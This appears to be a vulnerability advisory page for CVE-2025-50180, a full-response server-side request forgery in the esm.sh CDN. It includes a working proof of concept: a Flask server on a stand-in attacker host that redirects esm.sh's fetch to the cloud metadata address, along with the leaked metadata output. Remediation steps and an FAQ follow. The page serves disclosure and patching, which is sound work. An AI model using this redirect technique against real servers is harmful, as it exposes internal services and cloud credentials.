CVE-2025-50180: esm.sh is vulnerable to full-response SSRF
Summary
esh.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability.
Details
Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511
If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address.
eg: https://esm.sh/https://local.site/test.md
".js", ".ts", ".mjs", ".mts", ".jsx", ".tsx", ".cjs", ".cts", ".vue", ".svelte", ".md", ".css"
A 302 redirect can be used to bypass the suffix restriction.
eg: https://esm.sh/https://attacker.site/test.md
https://attacker.site/test.md 302 redirect to http://169.254.169.254/v1.json
PoC
Use Flask to start a server that returns a 302 redirect.
python from flask import Flask, redirect
app = Flask(name)
@app.route('/test.md') def redirecttest(): return redirect("http://169.254.169.254/v1.json", code=302)
if name == 'main': app.run(host='0.0.0.0', port=80)
Let esh.sh visit this site.
https://esm.sh/https://attacker.site/test.md
Attacker can obtain data from http://169.254.169.254/v1.json.
var t=<p>{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"","instance-v2-id":"","instanceid":"","interfaces":[{"ipv4":{"additional":[],"address":"","gateway":"","netmask":"","routes":[{"netmask":32,"network":""}]},"ipv6":{"additional":[],"address":"","network":"","prefix":"64"},"mac":"","network-type":"public"}],"nvidia-driver":[],"public-keys":[""],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}</p> ,o={},u=t;export{u as default,t as html,o as meta};
Decode the data (redacted) .
json {"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"","instance-v2-id":"","instanceid":"","interfaces":[{"ipv4":{"additional":[],"address":"","gateway":"","netmask":"","routes":[{"netmask":32,"network":""}]},"ipv6":{"additional":[],"address":"","network":"","prefix":"64"},"mac":"","network-type":"public"}],"nvidia-driver":[],"public-keys":[""],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}
Impact
An attacker can exploit the vulnerability to access internal sites, and in a cloud environment, can retrieve access keys (AK) and secret keys (SK) by accessing the metadata service address.
Fix
It is recommended to use safeurl.Client as a replacement for http.Client.
https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/internal/fetch/fetch.go#L13
https://github.com/doyensec/safeurl
Other sources
esm.sh is a no-build content delivery network (CDN) for web development. In version 136, esm.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability. Version 137 fixes the vulnerability.
— NVD
Affected Software
Remediation
Patch Available
Event History
Frequently Asked Questions
What is the severity of CVE-2025-50180?
CVE-2025-50180 is classified as a critical vulnerability due to the risk of exposing sensitive internal data.
How do I fix CVE-2025-50180?
To fix CVE-2025-50180, update esm.sh to version 0.0.0-20250616164159-0593516c4cfa or later.
Which versions of esm.sh are affected by CVE-2025-50180?
CVE-2025-50180 affects all versions of esm.sh up to but not including 0.0.0-20250616164159-0593516c4cfa.
What kind of attack can exploit CVE-2025-50180?
CVE-2025-50180 can be exploited through a Server-Side Request Forgery (SSRF) attack, allowing attackers to access internal resources.
What should I do if I cannot update esm.sh immediately to address CVE-2025-50180?
If immediate updates are not possible, implement network restrictions to limit access from esm.sh to your internal resources.